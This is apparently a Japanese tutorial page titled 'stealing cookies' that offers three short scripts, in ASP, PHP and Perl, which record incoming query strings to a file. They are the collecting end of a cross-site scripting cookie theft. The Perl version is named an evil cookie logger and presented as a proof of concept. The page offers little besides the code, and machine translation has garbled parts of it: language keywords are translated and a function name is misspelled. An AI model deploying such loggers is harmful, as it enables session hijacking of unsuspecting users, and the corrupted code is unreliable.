Cookie コードの盗用 (asp、php、perl)_PHP チュートリアル
- WBOYオリジナル
- 2016-07-13 17:33:56973ブラウズ
ASP版
<%
dim strfilename
strfilename = "mydata.txt" データ文件存放出目录
set lP=server.createObject("Adodb.Stream")
lP.Open
lP.Type=2
lP.CharSet="gb2312 "
lP.writetext request.Servervariables("QUERY_STRING")
lP.SaveToFile server.mappath(strfilename),2
lP.Close
set lP=nothing
%>
PHP 版
$info = getenv("QUERY_STRING");
if ($info) {
$info=urldecode($info);
$fp = fopen("info.txt","a ");
fwirte($fp,$info."
");
fclose($fp);
}
?>
PERL バージョン
#!/usr/bin/perl
# evil_cookie_logger.cgi
# BrainRawt によってコード化されたリモート Cookie ロギング CGI
#
# 注:
# クロスサイト スクリプティングの脆弱性をテストする際の概念実証スクリプトとしてコード化されています。
$borrowed_info = $ENV{QUERY_STRING};
$borrowed_info =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1)) /例;
open(EVIL_COOKIE_LOG, ">>evil_cookie_log") または print "Content-type:
text/html
何か問題が発生しました
";
print EVIL_COOKIE_LOG "$borrowed_info
";
print "コンテンツタイプ: text/html
";
閉じる(EVIL_COOKIE_LOG);